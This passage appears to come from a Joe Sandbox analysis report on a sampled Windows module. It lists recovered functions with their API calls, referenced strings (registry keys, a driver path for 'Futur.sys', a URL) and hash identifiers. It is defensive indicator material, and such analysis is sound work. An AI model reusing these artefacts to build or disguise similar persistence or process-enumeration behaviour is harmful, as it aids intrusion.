                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: LongWindow$MessageSend_memset
                                                                                                                                      • String ID: ,
                                                                                                                                      • API String ID: 2997958587-3772416878
                                                                                                                                      • Opcode ID: a92c395ea45a2ebf7b504cf0472e6c07373b7645b73ce75466d7df523ae02bed
                                                                                                                                      • Instruction ID: 257eb55d4c080d38eaa20e7fc8abb06e4a6a8eb8ef2d64fe1c83a72ca229de40
                                                                                                                                      • Opcode Fuzzy Hash: a92c395ea45a2ebf7b504cf0472e6c07373b7645b73ce75466d7df523ae02bed
                                                                                                                                      • Instruction Fuzzy Hash: 0831D034A00711AFDB15DFB4CA88A5EB7B4BF4831CF22462DE6569B794DB31E800CB94
                                                                                                                                      Function 69E88CE0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 103COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _memset
                                                                                                                                      • String ID: 1$PowerChange
                                                                                                                                      • API String ID: 2102423945-402230018
                                                                                                                                      • Opcode ID: 68c369046675604326a09b8f10cda734884ce05ed4a1c966e7e1329b4820bb93
                                                                                                                                      • Instruction ID: 88809b8bf7a5ab98ecbd71d11bdb3249789e7e334ef937f3fec35aede76bacf0
                                                                                                                                      • Opcode Fuzzy Hash: 68c369046675604326a09b8f10cda734884ce05ed4a1c966e7e1329b4820bb93
                                                                                                                                      • Instruction Fuzzy Hash: E331C0705083849FD326CB58E955BDBB7E8AF85708F14891DE9D887281EB70A608C7D3
                                                                                                                                      Function 69EB1DE5 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 101registryCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 69EB1DEF
                                                                                                                                      • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 69EB1ED5
                                                                                                                                      • RegEnumKeyA.ADVAPI32(?,00000000,?,00000104), ref: 69EB1EF2
                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 69EB1F12
                                                                                                                                      • RegQueryValueA.ADVAPI32(80000001,?,?,?), ref: 69EB1F2D
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CloseEnumH_prolog3_OpenQueryValue
                                                                                                                                      • String ID: Software\
                                                                                                                                      • API String ID: 1666054129-964853688
                                                                                                                                      • Opcode ID: ceda55ffe2e7999fb212d7be61d8692b66dd21705226ca2ba52f3808a21137ac
                                                                                                                                      • Instruction ID: a454b3d1d9dc2dc7777a0107de4fe1d087d9373b1c463759708b8b156fd89056
                                                                                                                                      • Opcode Fuzzy Hash: ceda55ffe2e7999fb212d7be61d8692b66dd21705226ca2ba52f3808a21137ac
                                                                                                                                      • Instruction Fuzzy Hash: 2641D535800118DBCF22DBA0CE40ADDB7BDAF49324F6085D9E149E6194DB309F95CF90
                                                                                                                                      Function 69EA01D0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 100COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _memset.LIBCMT ref: 69EA01FE
                                                                                                                                        • Part of subcall function 69EA3FB0: _memset.LIBCMT ref: 69EA3FD8
                                                                                                                                      • _memset.LIBCMT ref: 69EA023C
                                                                                                                                      • _memset.LIBCMT ref: 69EA0253
                                                                                                                                      • _memset.LIBCMT ref: 69EA0270
                                                                                                                                        • Part of subcall function 69E9E110: LoadLibraryA.KERNEL32(version.dll,?,?,00000000), ref: 69E9E14C
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _memset$LibraryLoad
                                                                                                                                      • String ID: LanderScr$http://www.LongZuYQ.com
                                                                                                                                      • API String ID: 1275148839-1063765635
                                                                                                                                      • Opcode ID: 12e79cfe0ce5ec4776f94844be43b0d1e87f08703442718487dcbe321f14772a
                                                                                                                                      • Instruction ID: 83cbe59bba63aabab8bf5f6af611eee053238528c45939696c859b04b5aacea1
                                                                                                                                      • Opcode Fuzzy Hash: 12e79cfe0ce5ec4776f94844be43b0d1e87f08703442718487dcbe321f14772a
                                                                                                                                      • Instruction Fuzzy Hash: 5931E6B5608340ABE320D7249D55FEF77DC9B96308F54882DE9998B151FA30960C87E2
                                                                                                                                      Function 69E859D0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 94COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _memset.LIBCMT ref: 69E859F7
                                                                                                                                      • _memset.LIBCMT ref: 69E85A0E
                                                                                                                                        • Part of subcall function 69E9DA10: GetModuleHandleA.KERNEL32 ref: 69E9DACA
                                                                                                                                        • Part of subcall function 69E9DA10: GetProcAddress.KERNEL32(00000000), ref: 69E9DAD1
                                                                                                                                      • OutputDebugStringA.KERNEL32(69EDF188,?,?,?,?,?,00000015,00000000), ref: 69E85A30
                                                                                                                                      • _memset.LIBCMT ref: 69E85ABE
                                                                                                                                      • _sprintf.LIBCMT ref: 69E85ADE
                                                                                                                                      Strings
                                                                                                                                      • file path: %s, md5 :%s, match val : %d, xrefs: 69E85AD8
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _memset$AddressDebugHandleModuleOutputProcString_sprintf
                                                                                                                                      • String ID: file path: %s, md5 :%s, match val : %d
                                                                                                                                      • API String ID: 723078608-2925406424
                                                                                                                                      • Opcode ID: d598f1f12f78ec4351cd49ee8aefd6f1d37eb48eed06c21eb0a60d1ee1070cad
                                                                                                                                      • Instruction ID: add5b93a5ecc050f47845f353994538b7c06f36b53a903ebfe8020ad0813418d
                                                                                                                                      • Opcode Fuzzy Hash: d598f1f12f78ec4351cd49ee8aefd6f1d37eb48eed06c21eb0a60d1ee1070cad
                                                                                                                                      • Instruction Fuzzy Hash: 932127B69082406BD320D768EDC1EAF7398AFC1359F64487DF55ED6141EA34990C8BA3
                                                                                                                                      Function 69EB1C67 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 86registryCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • __EH_prolog3_catch_GS.LIBCMT ref: 69EB1C71
                                                                                                                                      • RegOpenKeyA.ADVAPI32(?,?,?), ref: 69EB1CFF
                                                                                                                                      • RegEnumKeyA.ADVAPI32(?,00000000,?,00000104), ref: 69EB1D22
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: EnumH_prolog3_catch_Open
                                                                                                                                      • String ID: Software\Classes\
                                                                                                                                      • API String ID: 689246474-1121929649
                                                                                                                                      • Opcode ID: f9e5d10c62711b028bfa1ebdf62e4d973270f7cadc02673ef6752b693239617d
                                                                                                                                      • Instruction ID: d270a76fdcc846d9782a1c3a8478d23bdded471c0af3d4a6a925e95dc24fcea3
                                                                                                                                      • Opcode Fuzzy Hash: f9e5d10c62711b028bfa1ebdf62e4d973270f7cadc02673ef6752b693239617d
                                                                                                                                      • Instruction Fuzzy Hash: 04316D36C40168DBCB22DBA4CE44BDDB7B8AF0D324F2441D9E999A7281DB305F948F91
                                                                                                                                      Function 69E9DB40 Relevance: 10.6, APIs: 7, Instructions: 73processCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 69E9DB63
                                                                                                                                      • _memset.LIBCMT ref: 69E9DB7A
                                                                                                                                      • Process32First.KERNEL32 ref: 69E9DB90
                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 69E9DB9A
                                                                                                                                      • Process32Next.KERNEL32(00000000,?), ref: 69E9DBCC
                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,00000000,?,00000000,00000000,?), ref: 69E9DBFC
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CloseHandleProcess32$CreateFirstNextSnapshotToolhelp32_memset
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 4012237829-0
                                                                                                                                      • Opcode ID: f8e6933533461d8dbdd1316c79407054f288454080bf9a32e248026375830d90
                                                                                                                                      • Instruction ID: 56a6b4eb93322ef29fe5c9b9da302daecb8bc3ea054dd107d5bd7dab8a4ae324
                                                                                                                                      • Opcode Fuzzy Hash: f8e6933533461d8dbdd1316c79407054f288454080bf9a32e248026375830d90
                                                                                                                                      • Instruction Fuzzy Hash: 4611F3395043505BD310DB249855EEF77A8AFC6314F50452EF95587281E735A24DC6E2
                                                                                                                                      Function 69EB606D Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 66registryCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 69EB609D
                                                                                                                                      • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 69EB60C0
                                                                                                                                      • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 69EB60DC
                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 69EB60EC
                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 69EB60F6
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CloseCreate$Open
                                                                                                                                      • String ID: software
                                                                                                                                      • API String ID: 1740278721-2010147023
                                                                                                                                      • Opcode ID: dc2d94278bbc7286ebdd5a248f9eef3d9810371f43c58831b1f1980bcf148ce8
                                                                                                                                      • Instruction ID: 0bf08bf33f23bf409e929cb04fd5f80f59cf70d5c5717937a44b47c1e4e3e164
                                                                                                                                      • Opcode Fuzzy Hash: dc2d94278bbc7286ebdd5a248f9eef3d9810371f43c58831b1f1980bcf148ce8
                                                                                                                                      • Instruction Fuzzy Hash: CD11F872D00158FBCB21DB9ACD88CDFBFBDEF89714B2040AAE504A2115D7719A14DBA0
                                                                                                                                      Function 69E87140 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 64registryCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000002,SYSTEM\CurrentControlSet\services\Futur,00000000,00020019,?), ref: 69E87178
                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 69E87199
                                                                                                                                      • GetFileAttributesA.KERNEL32(C:\Windows\System32\Drivers\Futur.sys), ref: 69E871AD
                                                                                                                                      Strings
                                                                                                                                      • C:\Windows\System32\Drivers\Futur.sys, xrefs: 69E871A8, 69E871E0
                                                                                                                                      • SYSTEM\CurrentControlSet\services\Futur, xrefs: 69E8716E
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AttributesCloseFileOpen
                                                                                                                                      • String ID: C:\Windows\System32\Drivers\Futur.sys$SYSTEM\CurrentControlSet\services\Futur
                                                                                                                                      • API String ID: 1342945838-3794961940
                                                                                                                                      • Opcode ID: 9427854ecd6614b2667987a8d3e9c2ad5ecdf68aaec9e0aa148959bd9d07773e
                                                                                                                                      • Instruction ID: 6d1d0d457b37b990d851c6c3eeb6c0ee77349d36079c33ea1d4c1c323eb4cdb3
                                                                                                                                      • Opcode Fuzzy Hash: 9427854ecd6614b2667987a8d3e9c2ad5ecdf68aaec9e0aa148959bd9d07773e
                                                                                                                                      • Instruction Fuzzy Hash: 68110874B042109BDB01D7B4DB05A5E77A4BF8A364FB0C95DF82DC6280D732C405C792
                                                                                                                                      Function 69EB5023 Relevance: 10.6, APIs: 7, Instructions: 51memoryCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 69EB502A
                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 69EB5034
                                                                                                                                        • Part of subcall function 69EC3660: RaiseException.KERNEL32(?,?,00000000,?), ref: 69EC36A2
